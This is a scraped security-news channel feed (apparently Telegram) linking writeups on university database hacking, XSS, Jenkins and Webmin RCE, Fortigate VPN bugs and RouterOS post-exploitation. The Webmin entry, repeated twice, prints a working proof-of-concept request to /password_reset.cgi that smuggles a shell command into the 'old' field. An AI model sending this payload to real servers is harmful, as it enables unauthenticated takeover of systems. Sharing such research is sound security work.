How i was able to hack into databases of my university
https://medium.com/@fouadsarmi/how-i-was-able-to-hack-into-databases-of-my-university-669d6442a943
https://medium.com/@fouadsarmi/how-i-was-able-to-hack-into-databases-of-my-university-669d6442a943
Medium
How i was able to hack into databases of my university
hello guys , after graduate from the high school i was interesting about hacking and penetration testing , so my full mind was surrounded…
10 years of virtual dynamite: A high-level retrospective of ATM malware
https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html
https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html
Cisco Talos Blog
10 years of virtual dynamite: A high-level retrospective of ATM malware
ATM malware has evolved to include a number of different families and different actors behind them, ranging from criminal groups to actors affiliated with nation states.
Сookie-based XSS exploitation | $2300 Bug Bounty story
https://medium.com/@iSecMax/%D1%81ookie-based-xss-exploitation-2300-bug-bounty-story-9bc532ffa564
https://medium.com/@iSecMax/%D1%81ookie-based-xss-exploitation-2300-bug-bounty-story-9bc532ffa564
Medium
Сookie-based XSS exploitation | $2300 Bug Bounty story
For quite a long time I have been hunting for vulnerabilities on the HackerOne platform, allocating a certain amount of time outside the…
Multiple vulnerabilities in Oracle Business Intelligence, admin session bypass trick
https://github.com/vah13/Oracle-BI-bugs#cve-2019-2768
https://github.com/vah13/Oracle-BI-bugs#cve-2019-2768
GitHub
GitHub - vah13/Oracle-BI-bugs
Contribute to vah13/Oracle-BI-bugs development by creating an account on GitHub.
Payload to create a new user with Admin role exploiting Jenkins Metaprogramming RCE
https://gist.github.com/akhil-reni/e2116cc243af096ca3416168f49b3298
https://gist.github.com/akhil-reni/e2116cc243af096ca3416168f49b3298
Gist
Jenkins Metaprogramming RCE Create new user
Jenkins Metaprogramming RCE Create new user . GitHub Gist: instantly share code, notes, and snippets.
Forwarded from امنیت اطلاعات
PowerShell: Get Last Domain Logon with Get-ADUserLastLogon
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
Orange
Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN
This is 🍊 speaking
Forwarded from امنیت اطلاعات
"Webmin 0day remote code execution"
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
RouterOS Post Exploitation
a tool to help enable and maintain root shell access in RouterOS 3.x through the current release.
https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790
@sec_nerd_en
a tool to help enable and maintain root shell access in RouterOS 3.x through the current release.
https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790
@sec_nerd_en
Medium
RouterOS Post Exploitation
Shared Objects, RC Scripts, and a Symlink